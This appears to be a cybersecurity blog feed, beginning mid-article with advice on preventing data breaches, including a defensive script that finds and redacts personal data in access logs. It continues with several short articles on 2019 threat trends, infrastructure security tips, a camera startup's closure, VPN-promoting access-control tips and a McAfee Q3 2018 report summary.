Personal data in logs: another weak spot other than the backups may be your logs. They usually lie on separate servers, and are not as well guarded. That’s usually okay, since logs don’t contain personal information, but sometimes they do. I recently stumbled upon a large company’s website that had their directory structure unprotected and they kept their access log files alongside their static resources. In addition to that, they passed personal information as GET parameters, so you could get a lot of information by just getting the access logs. Needless to say, I did a responsible disclosure and the issue was fixed, but it was a potential breach.

How to prevent it? Don’t store personal information in logs. Avoid submitting forms with a GET method. Regularly review the code to check that personal data is not logged. Make sure your logs are stored in a way as protected as your production servers and your backups. It could be a cloud service, it could be a local installation of an open source package, but don’t overlook the security of the log collection system.
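As an added illustration (not code from the original post), the following script audits web access logs for personal data carried in GET query strings, the situation described above, and produces a redacted copy of each affected line. The parameter name list and the sample log lines are constructed assumptions; the log format assumed is the common one with the request line in double quotes.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Request line as it appears in common/combined access log formats.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
# Parameter names that normally carry personal data (assumed list; extend per app).
PII_PARAM_NAMES = {"email", "phone", "name", "first_name", "last_name",
                   "dob", "address", "passport", "ssn"}
EMAIL_RE = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")


def find_pii(line):
    """Return [(parameter, reason)] for personal data in the request's query string."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    hits = []
    query = urlsplit(match.group("target")).query
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.lower() in PII_PARAM_NAMES:
            hits.append((key, "param-name"))
        elif EMAIL_RE.fullmatch(value):
            # Catches personal data hidden behind a neutral name such as "q".
            hits.append((key, "email-value"))
    return hits


def redact(line):
    """Return the log line with the value of every flagged parameter replaced."""
    match = REQUEST_RE.search(line)
    flagged = {key for key, _ in find_pii(line)}
    if not match or not flagged:
        return line
    parts = urlsplit(match.group("target"))
    pairs = [(k, "REDACTED" if k in flagged else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    target = urlunsplit(parts._replace(query=urlencode(pairs)))
    return line[:match.start("target")] + target + line[match.end("target"):]


def scan(lines):
    """Map 1-based line numbers to their findings, skipping clean lines."""
    report = {}
    for number, line in enumerate(lines, 1):
        hits = find_pii(line)
        if hits:
            report[number] = hits
    return report


# Constructed sample access-log lines.
LINES = [
    '203.0.113.7 - - [10/Dec/2018:10:00:00 +0000] "GET /signup?email=alice%40example.com&plan=pro HTTP/1.1" 200 512',
    '203.0.113.8 - - [10/Dec/2018:10:00:02 +0000] "GET /search?q=bob%40example.org&page=2 HTTP/1.1" 200 2048',
    '203.0.113.9 - - [10/Dec/2018:10:00:05 +0000] "GET /static/app.js HTTP/1.1" 200 9000',
    '203.0.113.7 - - [10/Dec/2018:10:00:09 +0000] "POST /signup HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for number, hits in scan(LINES).items():
        print(number, hits, "->", redact(LINES[number - 1]))
```

Redaction only cleans up logs that already exist; the lasting fix is the one given above, moving such forms from GET to POST so the values never reach the request line.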

Data pushed to unprotected storage: a recent Alteryx/Experian leak was just that: data placed on a (somewhat) public S3 bucket was breached. If you place personal data in weakly protected public stores (AWS S3, file sharing services, FTPs), then you are waiting for trouble to happen.

How to prevent it? Don’t put personal data in public places. How to prevent that from happening? Always review your S3 bucket and FTP server policies. Have internal procedures that disallow sharing personal data without protecting it with at least a password shared by a side-channel (messenger/sms).

Unrestricted API calls: that’s what caused the Facebook-Cambridge Analytica issue. No matter how secure your servers are, if you expose the data through your API without access restriction, rate-limiting, fraud-detection and an audit trail, then your security is no use: someone will “scrape” your data through the API.

How to prevent it? Do not expose too much personal data over public or easily accessible APIs. Vet API users and inform your users whenever their data is being shared with third parties, via API or otherwise.

Internal actor: all of the woes above can happen due to poor security or due to internal actors. Even if your network is well guarded, an admin can go rogue and leak the data. For many reasons, nonincluding financial. A privileged internal actor has access to perform SELECT *, can decrypt the backups, can pretend to be a trusted API partner.

How to prevent it? Good operational security. A single sentence like that may sound easy, but it’s not. I don’t have a full list of things that have to be in place to guard against internal breaches: there are technical, organizational and legal measures to be taken. Have an unmodifiable audit trail. Have your intrusion prevention system (or logging solution) also detect anomalous internal behaviour. Have procedures that require two admins to work together in order to log in (e.g. split key) to the most. If the data is sensitive, do background checks on the privileged admins. And many more things that fall under the “operational security” umbrella.

Man-in-the-middle attacks: MITM can be used to extract data from active users only. It works on websites without HTTPS, or in case the attacker has somehow installed a wildcard certificate on the target machine (and before you say that’s too unlikely: it happens way too often to be ignored). In case of a successful MITM attack, the attacker can extract all data that’s being transferred.

How to prevent it? First, use HTTPS. Always. Redirect HTTP to HTTPS. Use HSTS. Use certificate pinning if you control the updates of the application (e.g. through an app store). The root certificate attack unfortunately cannot be circumvented. Sorry, just hope that your users haven’t installed such shitty software. Fortunately, this won’t lead to massive breaches; only data of active users that are being targeted may leak.

JavaScript injection / XSS: if somehow an attacker can inject JavaScript into your website, they can collect data being entered. This is what happened in the recent British Airways breach. I remember a potential attack on NSW (Australia) elections, where the Piwik analytics script was loaded from an external server that was vulnerable to a TLS downgrade attack which allowed an attacker to replace the script and thus interfere with the election registration website.

How to prevent it? Follow the XSS protection cheat sheet by OWASP. Don’t include scripts from dodgy third party domains. Make sure third party domains, including CDNs, have a good security level (e.g. run Qualys SSL test).

Leaked passwords from other websites: one of the issues with incorrect storage of passwords is password reuse. Even if you store passwords properly, a random online store may not, and if your users use the same email and password there, an attacker may try to steal their data from your site. Not all accounts will be compromised, but the more popular your service is, the more accounts will be affected.

How to avoid it? There’s not much you can do to make other websites store passwords correctly. But you can encourage the use of pass phrases, you can encourage 2-factor authentication in case of sensitive data, or you can avoid having passwords at all and use an external OAuth/OpenID provider (this has its own issues, but they may be smaller than those of password reuse). Also have some rate-limiting in place so that a single IP (or an IP range) is not able to try and access many accounts consecutively.

Employees sending emails with unprotected excel sheets: especially non-technical organizations and non-technical employees tend to just want to get their job done, so they may send large excel sheets with personal data to colleagues or partners in other companies. Then once someone’s email account or server is breached, the data gets breached as well.

How to prevent it? Have internal procedures against sending personal data in excel sheets, or at least have people zip them and send passwords through a side channel (messenger/sms). You can have organization-wide software that scans outgoing emails for attachments with excel sheets that contain personal data and have these emails blocked.

Data breaches are prevented by having good information security. And information security is hard. And it’s the right combination of security practices and security products that minimize the risk of incidents. Many organizations choose not to focus on infosec, as it’s not their core business or they estimate that the risk is worth it, viewing breaches, internal actors manipulating data and other incidents as something that can’t happen to them. Until it happens.


GUEST ESSAY: Top cybersecurity developments that can be expected to fully play o ...


From a certain perspective, 2018 hasn’t been as dramatic a cybersecurity year as 2017, in that we haven’t seen as many global pandemics like WannaCry.


Still, ransomware, zero-day exploits and phishing attacks were among the biggest threats facing IT security teams this year. 2018 has not been a dull year as far as breaches go. The cycle of exploit to discovery to weaponization has become shorter, and unfortunately, it has become more difficult to protect the enterprise network and the various devices connected to it.

In 2017, roughly 63% of organizations experienced an attempted ransomware attack, with 22% reporting these incidents occurred on a weekly basis. We expect to wind up with close statistics for 2018.

Here are a few trends I expect will dominate cyber security in 2019.

Security and Privacy Merge

Despite the fact that everyone is still trying to understand the new privacy landscape and perhaps because they haven’t fully grasped the new realities, everyone is paying attention. Perhaps it is our ever increasing focus on privacy in general and GDPR specifically.

Perhaps it is because more organizations will be working long hours to embrace the compliance measures that are needed to protect privacy that we won’t see a major lawsuit against a company. All we know is that we have seen an increase in companies seeking NAC solutions to keep up with all the new compliance regulations and it is very satisfying to hear that sigh of relief, when a company has implemented their solution.

AI + ML = forensics and investigations

Artificial Intelligence (AI) and Machine Learning (ML) are going to be implemented into the arena of practical usage in cyber security mainly for forensics and identification of culprits in cyber events. Investigating security events is costly both in terms of time and the expertise required.


We believe that AI and ML are well positioned to help in these investigations for obvious reasons, relating to computing power and specialized programming of what to look for and the ability to learn. AI and ML enable the clustering and analysis of monumental volumes of data that would otherwise be impossible to do within a reasonable amount of time even if you had the best trained minds in the business working on the investigation.

Ransomware: more targeted attacks are expected against wealthy and famous individuals

Social networks offer a world of insights and information on almost anyone who has an account. Unfortunately, they provide a lot of details that assist cyber offenders. The monetization of attacks (due to bitcoin) and the ease of performing spear phishing attacks will all be combined for a more targeted approach.

IoT security issues will increase

IoT will be deployed in more business usages and scenarios. The risk will rise and eventually this will cause more issues with a few headlines of devices that were used to hack networks.

The conversation: whose job is it to protect organizations in the public and private sector?

Nationwide attacks on large businesses will bring up the discussion of who should protect a country and a business from cyber security attacks. Should the state and country be active in the defense of the private sector? In the same respect, you wouldn’t expect a bank branch to deploy anti-missile defense systems against the possibility of an offending country.

At Portnox, we will continue to innovate our network security and risk control tools to provide solutions to all, empowering our customers with valuable, holistic solutions to protect their networks.

About the essayist: Ofer Amitai is CEO of Portnox, which supplies network access control, visibility, management and policy compliance systems designed to help today’s complex networks run smoothly and securely.

(Editor’s note: This article also appeared on Portnox Point)

Threat invasion: Secure your infrastructure


In this day and age of technology, we could all stand to secure our data more strongly. We’re in the age of one-click buying and complicated passwords. Our data should be more secure than ever, yet many businesses find themselves facing a cyber attack each year. Businesses both big and small are open to attack.

In fact, 58% of malware attack victims are small businesses. That means no organization is safe today. The best way to protect yourself, your employees, and your customers is to have a plan of action to secure your infrastructure. Keep reading to learn ways you can secure your own infrastructure today.

Understand the reality

First, you need to understand the reality of the threat. Cyber hackers are a reality of today. They’re here to stay, and they’re getting more sophisticated at breaking through company firewalls. Cyber attacks aren’t just limited to big businesses. While most of the recent attacks that gain the most attention have included large companies like Target and Neiman Marcus, they’re far from the only ones facing this threat.

The best way to protect your company is to start today. This isn’t a situation where you can blissfully look away and hope for the best. Take the time to familiarize yourself with the types of cyber fraud schemes and different threats happening right now. From there, follow the tips below.


Encrypt your data

You need to protect your data like it’s gold. Know what data is your most important data, or your crown jewels, and start there. Things like bank account numbers, credit card numbers, and social security numbers all need to be protected from threat first. This starts by turning to full-disk encryption tools. Not only is this incredibly simple, but it’s a good first step.

Don’t stop there. Ensure your company computers have automatic settings so they’ll log out quickly if not in use. It only takes a few minutes of inactivity to let hackers into your network. Don’t be caught with your information out in the open.

Restrict access

As we said, you need to protect your data. Restricting access to only those who need access to top information is key. While most employees are well-intentioned, they might not know the best way to keep that information protected. Use software to keep your information in the hands of the right people only. Add intuitive access rights monitoring by SolarWinds to your system to ensure you can review access rights regularly.

Educate employees

Along with monitoring your access, create a culture in your office of education when it comes to cybersecurity. Talk openly about your concerns with your leaders. Make sure they’re aware of the latest trends in security and the most common attacks. Teaching your team the signs of a cyber attack can go a long way to protecting your business.

Security isn’t just one person’s responsibility. It’s everyone’s responsibility, and nobody is immune. Include management, IT, and lower-level team members in your education program. Focus on continuous education for the upper-level employees with access to more information. Cyber security isn’t one-and-done. You’ll need ongoing updates and meetings to keep your team aware of any changes to your infrastructure.

Finally, create rules for employees focused on safety. Set guidelines for using email, browsing social media, and mobile devices at work. You want to create a culture of “safe browsing.” Teach your employees to be skeptical of any strange links and to think of strong passwords. These tips will also help them protect their own information on a regular basis.

Secure your hardware

Many cyber attacks don’t even involve breaches of your system. Physical electronic equipment is also stolen, and it’s an easy way for hackers to gain valuable information. It’s easy to overlook securing your equipment, but that would be a mistake. Physically lock down your computer with Kensington lock ports. Even just a small tethered cord can go a long way towards protecting your devices.

While there’s no way to 100% protect your equipment from being stolen, this is a great way to deter any potential criminals. Involve employees in keeping your equipment safe. Have everyone lock server rooms, encrypt their digital information, and use cloud computing to store information. Another benefit of cloud computing is being able to track down any devices that are stolen.

Protect your infrastructure

Your company requires your guidance to stay protected against attacks. Cyber attacks are becoming more and more common. They’re the new normal in our digital age, and it’s up to all of us to take steps to deter these hackers from breaching your security.

Your reputation is on the line. Take action today with the tips above to secure your company infrastructure. It’s hard to reclaim employee and customer trust after losing your information to hackers. Don’t become another news story.

AI-powered security camera company Lighthouse shuts down


A new company called Lighthouse introduced an advanced security camera that can tell the difference between a person and a pet back in 2017. It was a promising, Andy Rubin-backed project that managed to raise around $20 million. Unfortunately, it sounds like not a lot of people were willing to pay $300 for a security cam, even if it's powered by advanced AI and 3D sensing, because the company is shutting down operations. CEO Alex Teichman announced the closure on its website, where he admitted that Lighthouse didn't make enough money to keep the company going.

How to prevent unauthorized computer access


Unauthorized computer access means invading a private computer without the owner’s consent. Unauthorized computer use, on the other hand, means using a computer’s data with malicious intentions and without permission from its owner. This act can be a minor or major offense depending on the jurisdiction.

With digital devices exponentially gaining popularity every single day, hacking incidents, data prying, unauthorized access and ransomware attacks, among many others, are increasing as well.

Beefing up security thus becomes the main option. Such scenarios usually arise when you use unsecured access to the internet without firewalls to protect against viruses and malware or leave your system unattended.

Most cybercriminals are aware of loopholes that computer users are unaware of, subjecting them to breach of personal data and the system.

This article is critical in making sure you protect your personal data and protect against malware as well. ExpressVPN details many ways and best tips that users can use to secure their computers against cyber rogues. Remember, a secure computer leads to peace of mind.

Tips to help prevent unauthorized computer access

1. Strong Passwords

Having a computer password should be a personal policy. It is a first step in stopping unauthorized access to your computer’s operating system. This keeps unwanted people away from your computer in the first instance. You may create additional accounts for guests so that your password remains personal.

Moreover, you should change your password more often and incorporate numbers and special characters to make it hard for guests to memorize. Your password should neither be written down nor shared with anyone.

2. Install antivirus or intrusion detecting software

Installing antivirus or spyware protection would prevent hackers from accessing private information on your computer. These add-ons can monitor your computer and notify you of any attempts that are or were being made by an intruder.

Installing these programs would prevent hackers from collecting your passwords, credit card details and other important personal information. Always keep the software up-to-date and verify your software security at all times; do not let it make changes to your computer.

3. Using VPN to Boost Security and Privacy

Any information security professional would always advise users to strengthen their computer’s data privacy and security by setting up a virtual private network. A VPN creates a connection between your computer and a secure server, increasing the security of the user’s web session, financial transactions, transmitted data, and online personal information. ExpressVPN reduces the risk of your connection being hijacked, whether on public Wi-Fi or by internet providers who snoop on and sell your personal data to advertisers based on your browsing trends and habits.

Moreover, ExpressVPN protects against identity theft by hiding IP addresses, blocking third parties from tracking, bypassing firewalls and accessing online content privately without censorship. Some key uses of a VPN include:

- Connecting remotely to an organization’s private network;
- Protecting your data when using public Wi-Fi;
- BitTorrent piracy hiding;
- Preventing government surveillance or censorship; and
- Accessing sites such as the Netflix library from restricted countries.

4. Handling your email: think before you click

E-mail has become one of the most common ways of attacking a computer. Being able to identify threats sent via email links and attachments would help you protect your computer and data. The following are threats that can be encountered:

Phishing Attachments: You should never run or open e-mail attachments which are sent from addresses that are not familiar to you. Spyware, viruses and other forms of malware can be distributed through e-mails containing attachments.

Phishing: This is an e-mail that seems to be from an official company like your personal bank, indicating that you need to log onto the bank’s web link to confirm your account settings. However, such e-mails link to sites built to steal personal data such as credit card information, passwords, and many other details.

5. Get a software or hardware firewall

It is advised that all computers should have a firewall solution. Firewalls protect your computer in two ways:

Hardware firewall: This is a physical device which connects to your home/personal network. A router can be used as a firewall solution.

Software firewall: This is a software program which is installed on a computer to help protect against unauthorized outgoing and incoming data. Note that this protects a specific computer only.

6. Always lock your computer

If you are stepping away from your desk and you want to keep your computer on, make sure you lock it so that it may require a password once someone wishes to access it.

7. Biometric Devices

These are devices that authenticate users’ identity by using their personal characteristics like fingerprints.

8. Install all Security Patches

Do not ignore the security pop-ups; make the updates to protect your data.

9. Maintain a Proper Backup of your Data

This would come in handy in a worst-case event like an attack that results in data loss. Make backups early and often.

10. Make sure you always verify your software security

Conclusion

Since there are so many risks in cyberspace and people can easily get your data without your permission, it is important to know that the primary responsibility for protecting yourself is yours. There are so many tips that can help keep you safe, like using firewalls, great VPNs like ExpressVPN, having strong passwords, not sharing your password and many others. Following these tips will prevent you from having to suffer losses or compromising your privacy.

McAfee Q3 Cybersecurity Report: Cryptomining and IoT Attacks on the Rise, Mobile Malware and Ransomware Attacks in Decline


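The global cybersecurity report for the third quarter of 2018 newly released by cybersecurity company McAfee (to obtain the original report, follow the IT经理网 WeChat account ctociocom and reply "mcafee2018" in the chat) shows that IoT malware grew 73% in the third quarter and that, surprisingly, although the cryptocurrency market went through an avalanche-like crash, cryptocurrency-mining malware kept up a strong growth rate of 71%.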


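Meanwhile, cybercrime is increasingly rampant: cybercriminals and the criminal underworld create 480 new threats every minute, organized cybercriminals have begun taking new measures to evade law enforcement, and the 2017 strikes on the Hansa and AlphaBay dark web markets are still continuing.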


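Other notable findings from the report:

Another threat trend worth watching in the third quarter of 2018 is that spam botnets began to surge. About 53% of spam botnet traffic in the third quarter was driven by Gamut, a top spam-generating botnet that pushes "sextortion" scams, which demand payment from victims and threaten to publish their browsing habits.

One encouraging change in the third quarter of 2018 is that the industry's efforts to contain ransomware and mobile malware have paid off: according to the McAfee report, new mobile malware fell by 24%, while ransomware, the number one threat of the past two years, grew by only 10% in the third quarter.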


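In the third quarter, data breach incidents fell 18% in the Americas and 22% in the Asia-Pacific region, but rose 38% in Europe.

By sector, data breach incidents in the financial sector rose 20% in the third quarter.

A new trend in 2018 is the "e-commerce-ization" of cybercrime: to evade law enforcement and build trust directly with customers, some organized cybercriminals have moved from using large online marketplaces to going independent and setting up their own online shops. This shift has brought new business to e-commerce website designers.

Ransomware as a service (RaaS): ransomware remains popular, having grown 45% over the past four quarters, and underground forums show strong interest in leading RaaS families such as GandCrab. Since the fourth quarter of 2017, the number of distinct ransomware families has declined, but partnerships among them have increased, for example the partnership in the third quarter between the GandCrab ransomware and the crypter service NTCrypt. Such partnerships and affiliate programs have raised infection rates and the level of service offered to RaaS customers.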
